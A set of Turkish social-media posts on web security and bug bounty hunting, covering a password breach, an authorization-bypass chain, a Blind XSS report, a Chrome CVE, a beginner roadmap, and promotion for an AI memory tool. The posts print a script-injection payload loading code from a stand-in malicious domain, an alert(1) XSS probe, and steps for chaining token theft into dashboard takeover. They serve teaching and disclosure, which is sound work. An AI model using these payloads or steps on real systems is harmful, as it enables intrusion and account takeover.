Sistemlerinden 3.7 milyon müşteri verisi sızdırıldı: Bu olay Baydöner sistemlerinde gerçekleşti. Bu sızıntının içinde 622.000 adet açık metin (plaintext) şifre yer alıyor. 2026 yılında bu kadar büyük bir yapıda şifrelerin düz metin olarak tutulması, sektördeki çok temel bir eksikliği tekrar yüzümüze çarpıyor. Şifre hashlemeyi bilmeyen yeni bir geliştirici için bunu elle yazmak zor veya karmaşık gelebilir. Ancak ilginç olan şu ki; elimizdeki yapay zeka araçları bu işlemi sadece saniyeler içinde en güvenli standartlarla uygulayabilir. Hatta size en baştan metodolojisini bile öğretebilir. Buna rağmen açık metin şifreler görüyorsak, sorun yapay zekada değil; arka planı sorgulamadığımız "vibe coding" kültüründeki siber körlüktedir. Yapay zekaya sadece "Bana bir login ekranı ve veritabanı tasarla" dediğinizde, ekranda her şey kusursuz çalışır. Ancak vibe coding yaparken bile arka plandaki mimariyi bilmek zorundayız. AI size çalışan bir kod verdiğinde ona bir mimar gibi şu soruları sorabilmeniz gerekir: - Şifreleri nasıl hash'ledik? Argon2 veya bcrypt kullandık mı? - Rainbow table saldırılarına karşı tuzlama (salt) yapıldı mı? Siber güvenlik bakış açısına sahip olmadan, sadece çalışan kod yazarak geliştirilen her sistem, aslında sadece zamanı gelmemiş bir veri sızıntısıdır. Vibe coding bizi gereksiz yüklerden kurtarıyor, ancak güvenliği yönetme sorumluluğunu üzerimizden almıyor. Metodolojileri ve sistem mimarilerini bilmeden kurulan her yapı, er ya da geç başkalarının veri tabanına dönüşür.

Bilgisayarınızda size yardımcı olsun diye kurduğunuz bir CLI aracı, basit bir açık yüzünden tüm sisteminizi başkasına teslim edebilir mi? Evet edebilir. Siber güvenlikte hiçbir zaman 'bu kadar basit bir hata yapmazlar' dememek lazım. Kullananlar kesinlikle acil güncellesin.

Senelerdir güvenlik üzerine okuyorum ama bazen en basit hatalar en can alıcı noktalarda saklanıyor. Bugün karşılaştığım bir vaka, tarayıcının adres çubuğunda görmediğimiz trafiği neden her zaman izlememiz gerektiğini hatırlatıyor. Giriş yapmadan erişilebilen bir URL ve 750 dolarlık bir ödülün hikayesi. Teknik Analiz Sıradan bir dashboard üzerinde gezinirken Burp Suite arka planda sessiz bir GET isteği yakalıyor. URL yapısı ilginç. /manage/competitors/12345?data=ABCDE Bu URL'i gizli sekmede açtığınızda sistem sizi içeri alıyor. Kimlik doğrulaması yok. Ancak karşımızda bir engel var. Token Bariyeri Sadece account_id (12345) bilmek yetmiyor. "data" parametresindeki token yanlışsa sistem veriyi vermiyor. Görünüşe göre güvenli. Ancak araştırmacı durmuyor. Başka bir uç nokta keşfediliyor. POST /v1/account/customers/ Bu API, herhangi bir account_id gönderdiğinizde o hesaba dair tüm özel verileri sızdırıyor. Buna az önce ihtiyacımız olan o gizli "data" token'ları da dahil. Zincirleme Reaksiyon İki zafiyeti birleştirdiğimizde senaryo şuna dönüşüyor. 1. API üzerinden hedef hesabın token'ını ele geçir. 2. Bu token'ı kullanarak unauthenticated dashboard'a sız. 3. Rakip kurallarını sil, değiştir veya yenilerini ekle. Sonuç: Tam kontrol. Mimari Ders Bir sistemin güvenliği, en zayıf API uç noktası kadardır. Görünürdeki UI'ı korumak yetmez, arka planda veri servis eden tüm gölge endpoint'lerin yetkilendirme kontrolünden geçmesi şart. Karmaşık exploit'ler her zaman şart değil. Bazen sadece doğru endpoint'leri uç uca eklemek yeterli oluyor.

Web uygulamanızın kapısına 10 kilit takıp, mobil API'nizin penceresini tamamen açık bırakıyorsunuz. Bug bounty testlerinde hepimizin düştüğü bir tuzak var: Sadece ana web arayüzünü zorlamak. Zhenwarx'ın paylaştığı $6.500 ödüllü Blind XSS raporu tam da bu ihmalin faturasını gösteriyor. Durumu inceleyelim: Hedef uygulamanın web arayüzünde çok katı bir WAF (Web Application Firewall) var. En basit "<i>" HTML etiketi bile anında drop yiyor ve bağlantı kesiliyor. Ancak aynı sisteme veri gönderen mobil uygulamanın API uç noktalarında hiçbir ağ koruması veya WAF filtresi yok. Araştırmacı durumu fark edince odağını hemen değiştiriyor: Mobil uygulamayı indirip basit bir hesap açıyor. Yorum ekleme formundan herhangi bir şifreleme veya filtrelemeye takılmadan şu payload içeriğini doğrudan veritabanına yazdırıyor: "><script src=maliciousjsdomain></script> Sonuç: Sadece 5 dakika sonra payload, yöneticinin içerikleri rutin olarak incelediği "Admin Paneli" ekranında çalışıyor. (Blind XSS yetki yükseltmesi) Mühendislik açısından hepimiz için önemli bir hatırlatma; web üzerinde inşa ettiğiniz koruma duvarları, mobil istemciler ve dış servisler sisteme doğudan veri basabiliyorsa tamamen anlamsızlaşıyor. Giriş doğrulamasını arayüzde değil, verinin sisteme temas ettiği en alt API katmanında merkezi olarak yapmak zorundayız, ben de geçmişte bu yanılgıya düşmüştüm.

Sadece renk ve şekil vermek için kullandığınız CSS bir gün bilgisayarınıza tam erişim sağlarsa ne olur?(CVE-2026-2441) Chrome'un 2026 yılındaki ilk Zero-Day zafiyeti olan CVE-2026-2441, tam da bu sorunun cevabı niteliğinde karşımıza çıktı. Modern tarayıcı mimarisinin ne kadar hassas bir denge üzerine kurulu olduğunu hatırlatan bu açık, alışılagelmişin dışında bir yerden, sadece yazı tiplerini şekillendirmekte kullanılan bir CSS kuralından sızdı. Bu teknik analizi hazırlarken arka plandaki C mimarisini ve bellek yönetimini derinlemesine inceledim. Gelin, siber güvenlik dünyasını hareketlendiren bu Use-After-Free (UAF) zafiyetine beraber bakalım. Zafiyetin Anatomisi Zafiyet, Chrome'un görüntüleme motoru Blink'in @ font-feature-values isimli CSS kuralını işleme biçiminde yatıyor. Bu kural, font özelliklerine isim vermek için kullanılıyor ve normal şartlarda oldukça zararsız görünüyor. Ancak sorun, verinin kendisinde değil, verinin işlendiği bellek yönetiminde ortaya çıkıyor. . Temel Sebep: Font Feature Value Maps yapıları işlenirken C tarafında bir yarış durumu (race condition) tetikleniyor. . Hata Mekanizması: Tarayıcı eşzamanlı olarak bellek üzerindeki bir haritayı güncellerken, o haritanın bulunduğu bellek alanını aniden serbest bırakıyor (free). Ancak kodun başka bir bölümü, hala o silinmiş belleğe işaret eden bir "dangling pointer" (boşta kalan işaretçi) üzerinden işlem yapmaya devam ediyor. . Saldırı Sonucu: Bir saldırgan, bu boşluktan yararlanarak ilgili bellek alanını kendi zararlı kodlarıyla doldurduğunda, tarayıcı bir sonraki erişimde bu veriyi gerçek bir komut gibi çalıştırıyor. Sonuç: Remote Code Execution (RCE). Yani sadece bir web sitesini ziyaret ederek tarayıcının kontrolünü saldırgana teslim etmek. Savunan Tarafın Perspektifi Bir sistem mimarı olarak, Chromium ekibinin bu sorunu nasıl çözdüğünü görmek oldukça öğretici. Kodun içinde bir işaretçinin bellekte ne kadar süre kalacağını tam olarak kestirememek, C gibi dillerde en sinsi mantık hatalarından biridir. Yama, bellek yönetimini manuel işaretçiler üzerinden yürütmek yerine std::move operasyonlarını kullanarak verinin güvenli yerel kopyalarını oluşturacak şekilde güncellendi. Artık işlem bitene kadar verinin bellekte kalması kesin olarak garanti ediliyor. Bu olaydan çıkarmamız gereken iki ana ders var: 1. Basit bir tasarım kuralı bile olsa, kullanıcı tarafından kontrol edilebilen her veri girişi potansiyel bir saldırı vektörüdür. 2. Rust gibi bellek güvenli dillerin tarayıcı motorlarına entegrasyonu artık bir lüks değil, yapısal bir zorunluluktur. Kullandığınız tarayıcı tabanı Chromium ise (Edge, Brave, Opera dahil), sisteminizi Chrome 145.0.7632.75 sürümüne veya üzerine vakit kaybetmeden güncelleyin. Güvenlik, sadece açık kapıları kapatmak değil, kapının nasıl inşa edildiğini anlamaktır. #Chrome #CVE20262441 #CyberSecurity #ZeroDay #ModernWeb #TechnicalMono

Yapay zekâlar gerçekten hatırlamaya başlarsa ne olur? Bazen bir fikir, sadece bir teknoloji projesi olarak değil; insanların birlikte üretme ve paylaşma isteğinin bir sonucu olarak ortaya çıkar. Lemma da tam olarak böyle bir düşünceden doğdu. Mehmet Bey’in Lemma’nın ortaya çıkış sürecini ve arkasındaki düşünceyi anlattığı konuşmasına kulak vermek gerçekten önemli. Çünkü bu proje yalnızca bir yazılım ya da teknik bir çalışma değil; aynı zamanda insanların kendi ihtiyaçlarını karşılayabilecek çözümleri üretmesine ilham veren bir yaklaşım sunuyor. Lemma’nın temelinde çok basit ama güçlü bir fikir var: Herkes, kendi alanında fayda sağlayacak araçları ve sistemleri geliştirebilir. Bu projeden yola çıkarak aslında herkes kendi işine yarayacak MCP’sini çıkarabilir, kendi üretim sürecini şekillendirebilir. Lemma tam da bu noktada bir kapı aralıyor. Bugün birçok değerli proje fark edilmeden geçip gidebiliyor. Oysa Lemma gibi girişimler; paylaşımın, ortak aklın ve üretmenin ne kadar kıymetli olduğunu bize yeniden hatırlatıyor. Bu yüzden bu projenin değerini bilmek, anlatmak ve daha fazla insanın bu fikirden ilham almasını sağlamak hepimiz için önemli. Belki de en güzel tarafı şu: Lemma tek bir kişinin projesi olarak kalmak zorunda değil. Aksine, herkesin katkı sağlayabileceği, kendi ihtiyacına göre geliştirebileceği bir düşünceyi temsil ediyor. Bu yüzden Mehmet Bey’in anlattıklarına gerçekten kulak vermek gerekiyor. Çünkü bazen bir fikri anlamak, yeni fikirlerin doğmasına vesile olur. Ve kim bilir, belki de Lemma’dan ilham alan bir sonraki büyük proje sizin fikrinizden doğacak. 🌱

🚀 Sıfırdan Bug Bounty 2026: 14 Günlük Ücretsiz Yol Haritası 2026 yılında siber güvenliğe adım atmak için pahalı araçlara veya binlerce dolarlık kurslara ihtiyacınız yok. İhtiyacınız olan tek şey: Sistemli bir çalışma planı ve doğru "Recon" (Keşif) mantığı. Birçok yeni başlayan, otomatik tarayıcıları çalıştırıp mucize beklerken yanılıyor. Gerçek ödüller (bounties), sistemin mantığını anlayan ve manuel test yapanlara gidiyor. İşte 14 günlük eksiksiz plan: 🛠️ AŞAMA 1: TEMEL İNŞASI (GÜN 1-3) Kod kırmadan önce, kodun nasıl "yaşadığını" anlamalısınız. Client-Server İlişkisi: Bir tarayıcı (Chrome/Firefox) sunucuya nasıl istek atar? HTTP Protokolü: GET (veri çekme), POST (form gönderme), PUT (güncelleme) ve DELETE metodlarını öğrenin. HTML/JS Okuma: Web sayfalarının iskeletini (formlar, input alanları, script tagları) okuyabilmek, açık bulmanın P'sidir. 🔍 AŞAMA 2: AVCI GÖZÜYLE BAKMAK (GÜN 4-7) En yaygın ve etkili başlangıç açıklarını somut örneklerle öğrenin: IDOR (Veri Sızıntısı): URL'deki `user_id=100` değerini `101` yaparak başka bir kullanıcının özel verisine erişebiliyor musunuz? XSS (Script Enjeksiyonu): Arama kutusuna `<script>alert(1)</script>` yazdığınızda sayfa bunu çalıştırıyor mu? Misconfigurations: Açık unutulmuş .env dosyaları veya varsayılan admin şifrelerini (admin/admin) kontrol edin. Ücretsiz Eğitim Kaynakları: PortSwigger Academy (Sektörün altın standardı). Hacker101 (HackerOne'ın ücretsiz video serisi). 📡 AŞAMA 3: KEŞİF (RECON) VE PROGRAM SEÇİMİ (GÜN 8-12) Yeni başlayanların en büyük hatası Google veya Meta gibi dev programlara saldırmaktır. Onlar yerine VDP (Vulnerability Disclosure Programs) programlarına odaklanın. VDP Avantajı: Para yerine "itibar puanı" veya "onur listesi" verirler. Rekabet çok düşüktür, öğrenmek için mükemmeldir. Modern Toollar (Ücretsiz): Subfinder & Amass: Subdomain keşfi için. httpx: Canlı hostları ayıklamak için. Burp Suite Community Edition: Trafiği yakalamak ve manipüle etmek için. 📝 AŞAMA 4: AV VE PROFESYONEL RAPORLAMA (GÜN 13-14) Bir açık bulduğunuzda onu nasıl sunduğunuz, ödül alıp almayacağınızı belirler. İyi bir rapor şunları içermelidir: 1. Title: Kısa ve net (Örn: "IDOR on /api/v1/user/settings allows PII leak"). 2. Summary: Açığın ne olduğunu bir cümlede özetleyin. 3. Steps to Reproduce: 1, 2, 3 şeklinde sıralı adımlar. 4. Impact: Bu açık işletmeye ne kadar zarar verebilir? (Critical/High). Unutmayın; "Recon" en önemli yetenektir. Otomatik tarayıcıları bir kenara bırakın ve sistemin mantığını manuel olarak sorgulamaya başlayın. 🛠️ #BugBounty #CyberSecurity #2026Roadmap #Hacking #InfoSec

Sadece API loglarını inceleyerek asıl sızıntıları gözden kaçırıyorsunuz ! 🚨 Çoğu bug hunter konfor alanından çıkamayıp sadece API yanıtlarına ve ana framework kurallarına odaklanıyor. Oysa the hacker mindset gereği asıl zafiyet UI'ın ötesinde, modern backend mimarilerinin state’i (durumu) HTML içine gömdüğü "hydration" aşamasında gizli. Ben de uzun süre sadece pırıl pırıl JSON dönen API uçlarını deşerdim. Zafiyetleri orada aramak kolaydır. Fakat modern sunucular, basit bir özel mobil User-Agent veya cihaza özel spesifik bir header uçurduğunuzda tamamen farklı bir rendering rotasına girebiliyor. Uygulamanın ana arayüzü erişiminizi bloklasa bile, arka planda gömülü <script> tagleri altındaki JSON objelerine tam yetkili verileri ve gizli CDN medya linklerini "yanlışlıkla" sızdırabilir. Server kapıyı kilitlerken pencereyi ardına kadar açık unutur. Bu açığı bulduğunuzda savunma (triage) tarafındaki mühendisler büyük ihtimalle "Bu sadece bir CDN Caching artefaktı, geçerli bir açık değil" diyeceklerdir. Onlarla empati yapıyorum: Yüzeysel loglardan bakınca gerçekten de bir cache kirlenmesi gibi durur. Ancak kodu derinden deştiğinizde, o linklerin spesifik bir data objesi olarak doğrudan "response body" içinde, o isteğe özel üretildiğini görebilirsiniz. Bu basit bir cache sorunu değildir; net bir "Server-Side Authorization Bypass"tır. Buradaki en kritik mühendislik dersi nedir biliyor musunuz? Bulduğunuz zafiyet hedeflerin 0'ünde çalışmayabilir. Yaptığımız testlerde hesapların bazen sadece ('inin bu spesifik koşullu zafiyetten etkilendiğini gördük. Corrupted session'lar (bozuk oturum durumları) veya spesifik backend routing koşulları bu açık kapıyı yaratıyor. "Her zaman tetiklenmiyor, reproducible değil" deyip raporu kapatmayın; o ('lik kırılma noktasının teknik kanıtını masaya koyun. Mental modelinizi 2026 standartlarına güncellemek için Checklist: • UI'ı geç, HTML kaynağındaki hydration (gömülü JSON) datalarını incele. • Özel mobil header'lar uçurarak backend'in routing tepkisini ve gizli uçlarını ölç. • Triage "cache" mi diyor? Sızıntının server tarafından anlık üretildiğini ispatla. Zafiyet aradığınız oyun sahasını genişletin. Odaklanmanız gereken yer her zaman görünen API response'ları değildir. 👇

Siber güvenlikte "chatbot" kullananlar yerinde sayarken, Lemma ile kendi otonom silahını inşa edenler farkı açıyor. 🕵️‍♂️🔥 Yapay zekayı basit bir araçtan, sizinle birlikte evrilen bir "Hafıza Silahı"na dönüştürün: • Memory Upgrade: Lemma sadece bir AI değil, sizin siber güvenlik tecrübenizi depolayan bir dış beyin. Her yeni açık, her mindset patern'i otonom olarak hafızaya işleniyor. • Efficiency Level-up: Tekrar eden aramalar bitti. Lemma hafızasındaki verilerle size en verimli, en rafine yanıtları vererek sizi bir üst seviyeye taşır. • Autonomous Evolution: Sistem kendi yeteneklerini (Skills) otonom yaratıyor. Yeni bilgilerle donanıyor, kullanılmayanları siliyor ve bu uzmanlığı diğer AI'ların da anlayabileceği bir dilde sonsuzluğa mühürlüyor. Yapay zekayı sadece kullanmayın, Lemma ile onu kendi uzmanlığınızın ölümsüz ve otonom bir parçası haline getirin. Fark tam burada başlıyor.

1/4: 2026 Bug Bounty Meta: Otomatik tarayıcıların sonu. 🚨 API dünyasında artık "düğmeye bas, ödül al" dönemi kapandı. Yüksek ödüllü ($10k ) açıklar artık otomasyonun değil, "Manual Logic" testlerinin radarında. Nedenleri ve yeni toolstack'i inceleyelim. 🧵 2/4: Neden Değişiyor? 🔍 Modern savunma mekanizmaları (WAF/IPS) artık gürültülü tarayıcıları saniyeler içinde blokluyor. Şu anki meta: **Manual Business Logic Testing**. Otomatize edilmiş "fuzzing" yerine, uygulamanın işleyişindeki lojik hatalara (BOLA, Mass Assignment) odaklanmak tek seçenek. 3/4: Kritik Vektörler ☣️ 2026'nın en yüksek volatiliteye sahip açık türleri: • **BOLA Zincirleri:** Yetki kontrolü atlanmış obje ID'leri (Broken Object Level Auth). • **Shadow APIs:** Unutulmuş veya dökümante edilmemiş eski API versiyonları. • **Mass Assignment:** Kayıt/Güncelleme anında manipüle edilebilen gizli parametreler. 4/4: 2026 Toolstack ✅ Recon aşamasında derinlik şart: • **Discovery:** Katana & Source Maps (.js.map) analizi ile gizli endpoint keşfi. • **Param Discovery:** Arjun (Gizli parametre tespiti). • **Brute-force:** Kiterunner. Özeti: Otomasyonu değil, lojiği kovalayın. 🎯 #BugBounty #API_Security #CyberSecurity #WebSecurity